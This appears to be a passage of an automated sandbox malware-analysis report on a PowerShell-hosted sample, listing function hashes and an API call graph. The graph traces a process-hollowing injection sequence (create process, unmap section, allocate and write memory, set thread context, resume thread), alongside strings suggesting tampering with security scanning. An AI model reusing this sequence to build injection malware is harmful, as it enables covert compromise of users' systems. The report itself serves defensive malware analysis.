                                                                                                                                        • Opcode Fuzzy Hash: 0db4242b1685a43706c9005a679e85225a0317807ec3f3471aa76743baf19071
                                                                                                                                        • Instruction Fuzzy Hash: 62E04F3480D1898FCF0AEB64D49A8FDBF74DE42215B1001ADD91B96292DA31058FCF81
                                                                                                                                        Function 06CC7E00 Relevance: .0, Instructions: 17COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2bbe8dbff536bdc16e2d7d855452593c7688757795a1eebfbde5de041b65d6b5
                                                                                                                                        • Instruction ID: 4fd90164eb424f67d8b4a71b07a0c67f47aa0c3111a69a216d62c881f22d061e
                                                                                                                                        • Opcode Fuzzy Hash: 2bbe8dbff536bdc16e2d7d855452593c7688757795a1eebfbde5de041b65d6b5
                                                                                                                                        • Instruction Fuzzy Hash: 25E04F34A08185DFDB44EF74D49A47D7FB1EB85204B00429DD885D7365DB312881CF81
                                                                                                                                        Function 06CCF640 Relevance: .0, Instructions: 16COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                        • Instruction ID: cf3beda674925b8e676c9e0172818a9e8af1835d99c2ec6c44abdf2490f080ce
                                                                                                                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                        • Instruction Fuzzy Hash: D2D067B1D042099F8780EFADC9415AEFBF4EF48214F6085AEC919E7311E7329A128FD1
                                                                                                                                        Function 06CC7E10 Relevance: .0, Instructions: 15COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5cde2be6370ab4956efc443d6dc338c1b50e9b1a6a95f13a7fec4919d2060ca0
                                                                                                                                        • Instruction ID: 406f038fa0297fe788215a18fab4b5b16dcd81134c57b746d286afb053b1a06e
                                                                                                                                        • Opcode Fuzzy Hash: 5cde2be6370ab4956efc443d6dc338c1b50e9b1a6a95f13a7fec4919d2060ca0
                                                                                                                                        • Instruction Fuzzy Hash: A0D04234A182099F8B44EBA5E45646ABBB5EB84205F004269E90AD3751EA306D51CFD1
                                                                                                                                        Function 06CC7D48 Relevance: .0, Instructions: 15COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ed23bdf6709b26db0b3a6c0ec2ee8c56821bbbf62072a346787a45056c5b2946
                                                                                                                                        • Instruction ID: c2b3eb38b2faaf3c3da8fe8eaab2ddfaedf2e0f69c611ec8365fda47f6aa3ecc
                                                                                                                                        • Opcode Fuzzy Hash: ed23bdf6709b26db0b3a6c0ec2ee8c56821bbbf62072a346787a45056c5b2946
                                                                                                                                        • Instruction Fuzzy Hash: CCD067308081099FCB08BBA5E85A4BDBF34EB54605F40416EE917D26D1AA30599ADED5

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 06CCB878 Relevance: 17.8, Strings: 14, Instructions: 282COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$$\r$$\r
                                                                                                                                        • API String ID: 0-446806649
                                                                                                                                        • Opcode ID: cafde7cd63c0b04d6a79fe91484a43ab5f164fa4e7844de4c30aa4efa06e3f51
                                                                                                                                        • Instruction ID: 2b80c06aae9210e3b2ee8b824f7ebc8ebb9e4fa3eb52dea2963d8cda5859bfae
                                                                                                                                        • Opcode Fuzzy Hash: cafde7cd63c0b04d6a79fe91484a43ab5f164fa4e7844de4c30aa4efa06e3f51
                                                                                                                                        • Instruction Fuzzy Hash: 1CC12974B043588FE7A8DF79C5947A9B7E2AF84300F2084BEC54AA7395DF349D418B52
                                                                                                                                        Function 06CCB868 Relevance: 16.5, Strings: 13, Instructions: 274COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$$\r
                                                                                                                                        • API String ID: 0-2487315717
                                                                                                                                        • Opcode ID: 777bb85f3e25b6a3e6cc33f1a453cf90cf7106d28caf95d56ded080fcfe8e740
                                                                                                                                        • Instruction ID: a998ed6a476c71bf2ce0e44019656044efe775a8b26c324183a760180c8b14fd
                                                                                                                                        • Opcode Fuzzy Hash: 777bb85f3e25b6a3e6cc33f1a453cf90cf7106d28caf95d56ded080fcfe8e740
                                                                                                                                        • Instruction Fuzzy Hash: E4B13874A053948FE7A89F78C5847A9B7F2AF84300F2084BEC54AA7395DF349D808B52
                                                                                                                                        Function 077D3928 Relevance: 10.3, Strings: 8, Instructions: 328COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'\r$4'\r$tP\r$tP\r$$\r$$\r$$\r$$\r
                                                                                                                                        • API String ID: 0-4015598155
                                                                                                                                        • Opcode ID: 9a1bce85d066de880c1f188d6c2a57fcdba6c75a86c7bc4ef0913c39721cda15
                                                                                                                                        • Instruction ID: e7e1a55a30460fc7754b9367fa577420ce6660c5a094a264cbdbed1de1231792
                                                                                                                                        • Opcode Fuzzy Hash: 9a1bce85d066de880c1f188d6c2a57fcdba6c75a86c7bc4ef0913c39721cda15
                                                                                                                                        • Instruction Fuzzy Hash: F6B156B2304342DFD7159A6988117BABBF29FC6291F18887BD449CB392DB71CC41C3A2
                                                                                                                                        Function 077D1BE0 Relevance: 7.9, Strings: 6, Instructions: 392COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'\r$4'\r$4'\r$4'\r$tP\r$tP\r
                                                                                                                                        • API String ID: 0-1384849700
                                                                                                                                        • Opcode ID: 3cbcdf989d691fbd2670687be0e8811bfbdc086bdf1cceb23d1380d687e949bf
                                                                                                                                        • Instruction ID: 4b11e82f0f21cd9f4ee109152b6605f53313dfb14d19e510d1709b32e9b24f16
                                                                                                                                        • Opcode Fuzzy Hash: 3cbcdf989d691fbd2670687be0e8811bfbdc086bdf1cceb23d1380d687e949bf
                                                                                                                                        • Instruction Fuzzy Hash: 02D14CB1B0430A8FD7259B6884107AABBF2AFC6251F55C4BBC545CB256DB31CC52C792
                                                                                                                                        Function 077D0568 Relevance: 6.7, Strings: 5, Instructions: 406COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: far$4'\r$4'\r$4'\r$4'\r
                                                                                                                                        • API String ID: 0-3332724161
                                                                                                                                        • Opcode ID: efa90702ed0f0c5a54dc3567a604970d584ac32043c115d55bd1b78f65e96fa5
                                                                                                                                        • Instruction ID: 805fe948a4ee6a6f8fe4ac9fd682bf4781781f396476da38af4fa3a1d6d017b3
                                                                                                                                        • Opcode Fuzzy Hash: efa90702ed0f0c5a54dc3567a604970d584ac32043c115d55bd1b78f65e96fa5
                                                                                                                                        • Instruction Fuzzy Hash: 36D127B17043519FD7159BB89410BAA7BB2AFC6260F14C4BBD845CB296DB718C82C7A2
                                                                                                                                        Function 077D3678 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'\r$4'\r$$\r$$\r$$\r
                                                                                                                                        • API String ID: 0-983056022
                                                                                                                                        • Opcode ID: 70a61c17b639639161d0ab4341db2c339c99a371f1139c9d0c5eb8ca63fd4a91
                                                                                                                                        • Instruction ID: 2f92027c10bdca320367703a0ab45afaac882a04ffde6cec3ac8694630a44332
                                                                                                                                        • Opcode Fuzzy Hash: 70a61c17b639639161d0ab4341db2c339c99a371f1139c9d0c5eb8ca63fd4a91
                                                                                                                                        • Instruction Fuzzy Hash: 475125F6704302DFDB258A6888517A6BBF29FC66A1F24887BC445CB255DB71CC81C7A3
                                                                                                                                        Function 077D5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $\r$$\r$$\r$$\r
                                                                                                                                        • API String ID: 0-937398501
                                                                                                                                        • Opcode ID: 8d78c3c152011521acc33aef33a16d36b6233089d3bb315abb4871ec54152b95
                                                                                                                                        • Instruction ID: 2e2545c5acd87d7c1241c161dc000b2552200cd9ca4a9231894717cb9a063881
                                                                                                                                        • Opcode Fuzzy Hash: 8d78c3c152011521acc33aef33a16d36b6233089d3bb315abb4871ec54152b95
                                                                                                                                        • Instruction Fuzzy Hash: 3D2129B2300352E7EB24557A8850B7BB7E6ABC56A1F34883BD905DB385DEB1CC508351

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:9.2%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:178
                                                                                                                                        Total number of Limit Nodes:14
                                                                                                                                        execution_graph 24414 2e11727 24415 2e11968 24414->24415 24416 2e1173c 24414->24416 24417 2e11a80 24415->24417 24418 2e11938 24415->24418 24428 2e117cb Sleep 24416->24428 24429 2e1174e 24416->24429 24421 2e11684 VirtualAlloc 24417->24421 24422 2e11a89 24417->24422 24420 2e11986 24418->24420 24423 2e11947 Sleep 24418->24423 24419 2e1175d 24432 2e119a4 24420->24432 24436 2e115cc VirtualAlloc 24420->24436 24424 2e116df 24421->24424 24425 2e116af 24421->24425 24423->24420 24426 2e1195d Sleep 24423->24426 24439 2e11644 Sleep Sleep 24425->24439 24426->24418 24428->24429 24431 2e117e4 Sleep 24428->24431 24429->24419 24433 2e1180a Sleep 24429->24433 24435 2e1182c 24429->24435 24430 2e116bf 24430->24424 24431->24416 24434 2e11820 Sleep 24433->24434 24433->24435 24434->24429 24438 2e11838 24435->24438 24440 2e115cc 24435->24440 24436->24432 24439->24430 24444 2e11560 24440->24444 24442 2e115d4 VirtualAlloc 24443 2e115eb 24442->24443 24443->24438 24445 2e11500 24444->24445 24445->24442 24446 2e14e88 24447 2e14e95 24446->24447 24450 2e14e9c 24446->24450 24452 2e14be4 24447->24452 24455 2e14bfc 24450->24455 24453 2e14bdc 24452->24453 24454 2e14be8 SysAllocStringLen 24452->24454 24453->24450 24454->24453 24456 2e14c02 SysFreeString 24455->24456 24457 2e14c08 24455->24457 24456->24457 24458 2e16518 24459 2e16523 24458->24459 24462 2e14168 24459->24462 24461 2e1655d 24463 2e141ae 24462->24463 24464 2e1422c 24463->24464 24474 2e14100 24463->24474 24464->24461 24466 2e143e9 24464->24466 24470 2e143fa 24464->24470 24479 2e1432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 24466->24479 24468 2e143f3 24468->24470 24469 2e1443f FreeLibrary 24469->24470 24470->24469 24471 2e14463 24470->24471 24472 2e14472 ExitProcess 24471->24472 24473 2e1446c 24471->24473 24473->24472 24475 2e14143 24474->24475 24476 2e14110 24474->24476 24475->24464 24476->24475 24478 2e115cc VirtualAlloc 24476->24478 24480 2e15814 24476->24480 24478->24476 24479->24468 24481 2e15824 GetModuleFileNameA 24480->24481 24483 2e15840 24480->24483 24484 2e15a78 GetModuleFileNameA RegOpenKeyExA 24481->24484 24483->24476 24485 2e15afb 24484->24485 24486 2e15abb RegOpenKeyExA 24484->24486 24502 2e158b4 6 API calls 24485->24502 24486->24485 24487 2e15ad9 RegOpenKeyExA 24486->24487 24487->24485 24489 2e15b84 lstrcpyn GetThreadLocale GetLocaleInfoA 24487->24489 24493 2e15bbb 24489->24493 24494 2e15c9e 24489->24494 24490 2e15b20 RegQueryValueExA 24491 2e15b40 RegQueryValueExA 24490->24491 24492 2e15b62 RegCloseKey 24490->24492 24491->24492 24495 2e15b5e 24491->24495 24492->24483 24493->24494 24496 2e15bcb lstrlen 24493->24496 24494->24483 24495->24492 24497 2e15be3 24496->24497 24497->24494 24498 2e15c30 24497->24498 24499 2e15c08 lstrcpyn LoadLibraryExA 24497->24499 24498->24494 24500 2e15c3a lstrcpyn LoadLibraryExA 24498->24500 24499->24498 24500->24494 24501 2e15c6c lstrcpyn LoadLibraryExA 24500->24501 24501->24494 24502->24490 24503 2e3bb48 timeSetEvent 24504 2e11a8f 24505 2e11aa1 24504->24505 24507 2e1170d 24504->24507 24506 2e11aa7 24505->24506 24511 2e11b13 Sleep 24505->24511 24510 2e11ab0 24506->24510 24512 2e11b81 24506->24512 24515 2e11b4b Sleep 24506->24515 24507->24504 24507->24506 24508 2e11c66 24507->24508 24509 2e116e8 24507->24509 24520 2e11644 Sleep Sleep 24509->24520 24511->24506 24514 2e11b2d Sleep 24511->24514 24518 2e11c00 VirtualFree 24512->24518 24519 2e11ba4 24512->24519 24514->24505 24515->24512 24517 2e11b61 Sleep 24515->24517 24516 2e116f5 VirtualFree 24516->24507 24517->24506 24520->24516 24521 2e3bb3c 24524 2e2ec6c 24521->24524 24525 2e2ec74 24524->24525 24525->24525 26861 2e28704 LoadLibraryW 24525->26861 24527 2e2ec96 24528 2e2ec9b 24527->24528 24529 2e2eca5 24528->24529 24530 2e2ecab 24529->24530 24531 2e2ecc0 24530->24531 24532 2e2ecaf 24530->24532 24533 2e14500 8 API calls 24531->24533 26875 2e14500 24532->26875 24535 2e2ecbe 24533->24535 26866 2e1480c 24535->26866 26881 2e280c0 26861->26881 26863 2e2873d 26889 2e27cf8 26863->26889 26867 2e1481d 26866->26867 26868 2e14843 26867->26868 26869 2e1485a 26867->26869 26871 2e14b78 8 API calls 26868->26871 26870 2e14570 8 API calls 26869->26870 26873 2e14850 26870->26873 26871->26873 26872 2e1488b 26873->26872 26874 2e14500 8 API calls 26873->26874 26874->26872 26876 2e14504 26875->26876 26879 2e14514 26875->26879 26878 2e14570 8 API calls 26876->26878 26876->26879 26877 2e14542 26877->24535 26878->26879 26879->26877 26880 2e12c2c 8 API calls 26879->26880 26880->26877 26882 2e14500 8 API calls 26881->26882 26883 2e280e5 26882->26883 26900 2e2790c 26883->26900 26885 2e280f2 26886 2e28112 GetProcAddress GetProcAddress 26885->26886 26904 2e144d0 26886->26904 26890 2e14500 8 API calls 26889->26890 26891 2e27d1d 26890->26891 26892 2e2790c 8 API calls 26891->26892 26893 2e27d2a 26892->26893 26942 2e28018 26893->26942 26896 2e280c0 10 API calls 26897 2e27d53 NtWriteVirtualMemory 26896->26897 26898 2e144d0 8 API calls 26897->26898 26899 2e27d8c FreeLibrary 26898->26899 26899->24527 26901 2e2791d 26900->26901 26908 2e14b78 26901->26908 26903 2e2792d 26903->26885 26905 2e144d6 26904->26905 26906 2e144fc 26905->26906 26907 2e12c2c 8 API calls 26905->26907 26906->26863 26907->26905 26909 2e14b85 26908->26909 26913 2e14bb5 26908->26913 26911 2e14b91 26909->26911 26914 2e14570 26909->26914 26911->26903 26919 2e144ac 26913->26919 26915 2e14574 26914->26915 26916 2e14598 26914->26916 26923 2e12c10 26915->26923 26916->26913 26918 2e14581 26918->26913 26920 2e144b2 26919->26920 26921 2e144cd 26919->26921 26920->26921 26933 2e12c2c 26920->26933 26921->26911 26924 2e12c27 26923->26924 26927 2e12c14 26923->26927 26924->26918 26925 2e12c1e 26925->26918 26926 2e12d19 26932 2e12ce8 7 API calls 26926->26932 26927->26925 26927->26926 26931 2e164cc TlsGetValue 26927->26931 26930 2e12d3a 26930->26918 26931->26926 26932->26930 26934 2e12c3a 26933->26934 26935 2e12c30 26933->26935 26934->26921 26935->26934 26937 2e12d19 26935->26937 26940 2e164cc TlsGetValue 26935->26940 26941 2e12ce8 7 API calls 26937->26941 26939 2e12d3a 26939->26921 26940->26937 26941->26939 26943 2e14500 8 API calls 26942->26943 26944 2e2803b 26943->26944 26945 2e2790c 8 API calls 26944->26945 26946 2e28048 26945->26946 26947 2e280c0 10 API calls 26946->26947 26948 2e28061 GetModuleHandleA 26947->26948 26949 2e144ac 8 API calls 26948->26949 26950 2e27d4d 26949->26950 26950->26896

                                                                                                                                        Executed Functions

                                                                                                                                        Function 02E28BA8 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 6798 2e28ba8-2e28bab 6799 2e28bb0-2e28bb5 6798->6799 6799->6799 6800 2e28bb7-2e28c9e call 2e1493c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c 6799->6800 6831 2e28ca4-2e28d7f call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c 6800->6831 6832 2e2a6ef-2e2a759 call 2e144d0 * 2 call 2e14c0c call 2e144d0 call 2e144ac call 2e144d0 * 2 6800->6832 6831->6832 6875 2e28d85-2e290ad call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e130d4 * 2 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e14d8c call 2e14d9c call 2e285d4 6831->6875 6984 2e29120-2e29441 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e12ee0 call 2e12f08 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c GetThreadContext 6875->6984 6985 2e290af-2e2911b call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c 6875->6985 6984->6832 7093 2e29447-2e296aa call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e2824c 6984->7093 6985->6984 7166 2e296b0-2e29819 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e284bc 7093->7166 7167 2e299b7-2e29a22 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 7093->7167 7258 2e29843-2e298ae call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 7166->7258 7259 2e2981b-2e29841 call 2e279ac 7166->7259 7192 2e29a28-2e29ba8 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e279ac 7167->7192 7193 2e29a23 call 2e2881c 7167->7193 7192->6832 7298 2e29bae-2e29ca7 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e28ab8 7192->7298 7193->7192 7266 2e298b4-2e299ab call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e279ac 7258->7266 7296 2e298af call 2e2881c 7258->7296 7259->7266 7337 2e299b0-2e299b5 7266->7337 7296->7266 7349 2e29cfb-2e2a453 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e27cf8 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e27cf8 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c SetThreadContext NtResumeThread call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e12c2c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e28798 * 3 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c 7298->7349 7350 2e29ca9-2e29cf6 call 2e289b0 call 2e289a4 7298->7350 7337->7192 7575 2e2a458-2e2a6ea call 2e28798 * 2 call 2e1480c call 2e1494c call 2e14798 call 2e1494c call 2e28798 call 2e1480c call 2e1494c call 2e14798 call 2e1494c call 2e28798 * 5 call 2e1480c call 2e1494c call 2e14798 call 2e1494c call 2e28798 call 2e1480c call 2e1494c call 2e14798 call 2e1494c call 2e28798 call 2e1480c call 2e1494c call 2e14798 call 2e1494c call 2e28798 call 2e1480c call 2e1494c call 2e14798 call 2e1494c call 2e28798 call 2e27ecc call 2e28798 * 2 7349->7575 7350->7349 7575->6832
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02E2881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02E28903), ref: 02E28860
                                                                                                                                          • Part of subcall function 02E2881C: GetProcAddress.KERNEL32(02E71384,00000000), ref: 02E28879
                                                                                                                                          • Part of subcall function 02E2881C: FreeLibrary.KERNEL32(02E71384,00000000,02E71388,Function_000055D8,00000004,02E71398,02E71388,000186A3,00000040,02E7139C,02E71384,00000000,00000000,00000000,00000000,02E28903), ref: 02E288E3
                                                                                                                                          • Part of subcall function 02E285D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E28660
                                                                                                                                        • GetThreadContext.KERNEL32(02E713D0,02E71420,ScanString,02E713A4,02E2A774,UacInitialize,02E713A4,02E2A774,ScanBuffer,02E713A4,02E2A774,ScanBuffer,02E713A4,02E2A774,UacInitialize,02E713A4), ref: 02E2943A
                                                                                                                                          • Part of subcall function 02E2824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E282BD
                                                                                                                                          • Part of subcall function 02E284BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02E28521
                                                                                                                                          • Part of subcall function 02E279AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E27A1F
                                                                                                                                          • Part of subcall function 02E27CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E27D6C
                                                                                                                                        • SetThreadContext.KERNEL32(02E713D0,02E71420,ScanBuffer,02E713A4,02E2A774,ScanString,02E713A4,02E2A774,Initialize,02E713A4,02E2A774,02E713CC,02E714BC,02E714F8,00000004,02E714FC), ref: 02E2A14F
                                                                                                                                        • NtResumeThread.NTDLL(02E713D0,00000000), ref: 02E2A15C
                                                                                                                                          • Part of subcall function 02E28798: LoadLibraryW.KERNEL32(?,?), ref: 02E287AC
                                                                                                                                          • Part of subcall function 02E28798: GetProcAddress.KERNEL32(02E71390,BCryptVerifySignature), ref: 02E287C6
